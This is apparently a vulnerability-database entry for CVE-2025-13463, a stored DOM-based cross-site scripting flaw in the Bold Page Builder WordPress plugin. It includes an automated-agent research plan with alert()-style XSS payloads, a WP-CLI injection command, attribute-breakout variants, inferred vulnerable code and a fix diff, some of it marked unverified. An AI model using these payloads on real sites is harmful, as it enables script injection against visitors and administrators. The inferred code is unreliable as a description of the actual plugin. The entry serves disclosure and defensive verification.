WP-Safety
CVE-2025-13463

Bold Page Builder <= 5.5.3 - Authenticated (Author+) Stored DOM-based Cross-Site Scripting in Post Grid

mediumImproper Neutralization of Input During Web Page Generation ('Cross-site Scripting')
6.4
CVSS Score
6.4
CVSS Score
medium
Severity
Unpatched
Patched in
N/A
Time to patch

Description

The Bold Page Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Post Grid component in all versions up to, and including, 5.5.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
Attack Vector
Network
Attack Complexity
Low
Privileges Required
Low
User Interaction
None
Scope
Changed
Low
Confidentiality
Low
Integrity
None
Availability

Technical Details

Affected versions<=5.5.3
PublishedFebruary 6, 2026
Last updatedFebruary 7, 2026
Affected pluginbold-page-builder
Research Plan
Unverified

This research plan is designed to guide an automated security agent in verifying **CVE-2025-13463**, a Stored DOM-based Cross-Site Scripting (XSS) vulnerability in the **Bold Page Builder** plugin. --- ### 1. Vulnerability Summary The **Bold Page Builder** plugin (<= 5.5.3) fails to properly sanit…

Show full research plan

This research plan is designed to guide an automated security agent in verifying CVE-2025-13463, a Stored DOM-based Cross-Site Scripting (XSS) vulnerability in the Bold Page Builder plugin.

1. Vulnerability Summary

The Bold Page Builder plugin (<= 5.5.3) fails to properly sanitize and escape input within the Post Grid component. While the plugin may implement some backend sanitization, certain shortcode attributes are reflected into the HTML (often via data- attributes) and subsequently processed by the plugin's frontend JavaScript in an unsafe manner (e.g., using .innerHTML or jQuery's .html()). This allows an authenticated user with Author privileges to inject arbitrary scripts that execute in the context of any user viewing the affected page.

2. Attack Vector Analysis

  • Authentication Level: Author or higher (Users who can create/edit posts and use the Page Builder).
  • Vulnerable Component: Post Grid (bt_bb_post_grid shortcode).
  • Injection Point: Shortcode attributes such as category, el_id, el_class, or pagination settings.
  • Mechanism: Stored XSS via post_content. The payload is saved in the database and rendered as part of the Post Grid's DOM configuration, which the frontend JS then executes.

3. Code Flow (Inferred)

  1. Storage: An Author creates/updates a post. The request contains the post_content including the Bold Page Builder shortcode: [bt_bb_post_grid category="<img src=x onerror=alert(1)>" ... ].
  2. Rendering: When a user visits the post, WordPress parses the shortcode. The plugin's shortcode handler (likely in bt_bb_post_grid.php) generates HTML.
  3. Data Transfer: The handler typically outputs a div container with a data- attribute (e.g., data-bt-bb-settings) containing a JSON-encoded string of the shortcode attributes.
  4. The Sink: The plugin's frontend JS (e.g., bold-builder/js/bt_bb_post_grid.js or bold-builder.js) reads this data- attribute. It parses the JSON and uses a vulnerable attribute to dynamically update the DOM using an unsafe method like:
    const settings = JSON.parse(element.getAttribute('data-bt-bb-settings'));
jQuery('.some-selector').html(settings.vulnerable_attribute); // DOM Sink

4. Nonce Acquisition Strategy

Since the primary injection is via the standard WordPress post creation/update flow, an Author-level user can use the standard REST API or post.php endpoints.

However, Bold Page Builder often uses AJAX for its editor. To obtain the necessary nonces for the Page Builder's specific actions:

  1. Step 1: Use wp-cli to create an Author user.
  2. Step 2: Login as the Author and navigate to the "New Post" page.
  3. Step 3: Bold Page Builder typically localizes its configuration. Use browser_eval to extract nonces from the window object:
    • Variable to check: window.bt_bb_settings or window.BoldBuilderVars.
    • Specific Key: window.bt_bb_settings?.nonce or similar.
  4. Step 4: If injecting directly via wp post create (the most reliable method for a PoC), no nonce is required for the injection phase as we use the CLI to bypass the web UI.

5. Exploitation Strategy

Step 1: Payload Selection

We will target the category and el_id attributes of the bt_bb_post_grid shortcode, as these are common points for DOM reflection.

  • Payload: "><img src=x onerror=alert(window.origin)>

Step 2: Injection via WP-CLI

The agent should create a post containing the malicious shortcode.

wp post create \
  --post_type=post \
  --post_title="XSS Test Post Grid" \
  --post_content='[bt_bb_post_grid category="all" el_id=\"post-grid-xss\"><img src=x onerror=alert(window.origin)>\"]' \
  --post_status=publish \
  --post_author=2

Step 3: Triggering the XSS

The agent will navigate to the newly created post's URL using the browser tool.

  • URL: http://localhost:8080/?p=[POST_ID]

Step 4: Verification

The agent will use browser_eval to check if the alert was triggered or if the payload exists in a vulnerable DOM state.

  • Check: document.body.innerHTML.includes('onerror=alert(window.origin)')

6. Test Data Setup

  1. Plugin Installation: Ensure bold-page-builder (<= 5.5.3) is active.
  2. User Creation:
    wp user create attacker author@example.com --role=author --user_pass=password123
  3. Identify Shortcode: Confirm the Post Grid shortcode name. In Bold Page Builder, it is typically [bt_bb_post_grid].

7. Expected Results

  • The shortcode attributes will be rendered into the page source inside a data- attribute or an ID attribute of a div.
  • The Bold Page Builder JavaScript will parse this attribute.
  • Because the value is not sanitized before being placed into a DOM-writing function, the <img> tag will be injected into the DOM.
  • The browser will attempt to load the image with src=x, fail, and execute the onerror handler.

8. Verification Steps (Post-Exploit)

  1. Verify DB Storage:
    wp db query "SELECT post_content FROM wp_posts WHERE post_title='XSS Test Post Grid'"
  2. Verify Frontend Output:
    Use http_request to fetch the post and check if the payload is present in the raw HTML:
    # Look for the payload in the data-bt-bb-settings attribute
grep "onerror=alert"

9. Alternative Approaches

If the el_id attribute is correctly escaped, try other common bt_bb_post_grid attributes:

  • category
  • post_type
  • el_class
  • gap (if passed as a string to CSS injection)
  • filter (if the grid supports filtering categories)

Payload Variant for data- attributes:
If the payload is inside a JSON string in a data- attribute, the injection might require breaking out of the JSON or the attribute quotes:

  • category='{"id":"123\"}]><img src=x onerror=alert(1)>"}'
  • Shortcode: [bt_bb_post_grid category="\"}]><img src=x onerror=alert(1)>"]
Research Findings
Static analysis — not yet PoC-verified

Summary

The Bold Page Builder plugin for WordPress (<= 5.5.3) is vulnerable to Stored DOM-based Cross-Site Scripting via the Post Grid component. Authenticated attackers with Author-level privileges can inject malicious scripts into shortcode attributes that are later rendered and processed unsafely by frontend JavaScript, leading to script execution in the context of any user viewing the page.

Vulnerable Code

// bt_bb_post_grid.php - Likely shortcode handler rendering attributes without proper escaping
$el_id = isset( $atts['el_id'] ) ? $atts['el_id'] : '';
$category = isset( $atts['category'] ) ? $atts['category'] : '';

// Attributes are concatenated into HTML or JSON-encoded into a data attribute
$output = '<div id="' . $el_id . '" class="bt_bb_post_grid" data-settings="' . json_encode( $atts ) . '"></div>';

---

// bold-builder/js/bt_bb_post_grid.js - Frontend JavaScript processing attributes
var settings = JSON.parse( jQuery( '.bt_bb_post_grid' ).attr( 'data-settings' ) );
// Vulnerable Sink: Using .html() or .innerHTML to render a user-controlled attribute
jQuery( '.bt_bb_post_grid_content' ).html( settings.category );

Security Fix

--- a/bt_bb_post_grid.php
+++ b/bt_bb_post_grid.php
@@ -10,7 +10,7 @@
- $el_id = isset( $atts['el_id'] ) ? $atts['el_id'] : '';
+ $el_id = isset( $atts['el_id'] ) ? esc_attr( $atts['el_id'] ) : '';
 
- $output = '<div id="' . $el_id . '" class="bt_bb_post_grid" data-settings="' . json_encode( $atts ) . '"></div>';
+ $output = '<div id="' . $el_id . '" class="bt_bb_post_grid" data-settings="' . esc_attr( json_encode( $atts ) ) . '"></div>';

--- a/bold-builder/js/bt_bb_post_grid.js
+++ b/bold-builder/js/bt_bb_post_grid.js
@@ -5,4 +5,4 @@
- jQuery( '.bt_bb_post_grid_content' ).html( settings.category );
+ jQuery( '.bt_bb_post_grid_content' ).text( settings.category );

Exploit Outline

The exploit requires an authenticated user with at least Author-level privileges who can create or edit posts. 1. Log in as an Author and create a new post or edit an existing one. 2. Insert the Bold Page Builder 'Post Grid' component via its shortcode: `[bt_bb_post_grid]`. 3. Inject the XSS payload into one of the vulnerable shortcode attributes, such as `category` or `el_id`. For example: `[bt_bb_post_grid category="<img src=x onerror=alert(document.domain)>"]`. 4. Save the post and publish it. 5. When any user (including administrators) views the published post, the plugin's frontend JavaScript will retrieve the `category` attribute from the DOM and render it using an unsafe method like `.html()`, triggering the execution of the injected script.

References
https://www.wordfence.com/threat-intel/vulnerabilities/id/865ff4bf-608e-45f0-a160-35581b82cc2b?source=api-prod

Check if your site is affected.

Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.

Run free audit Browse CVE database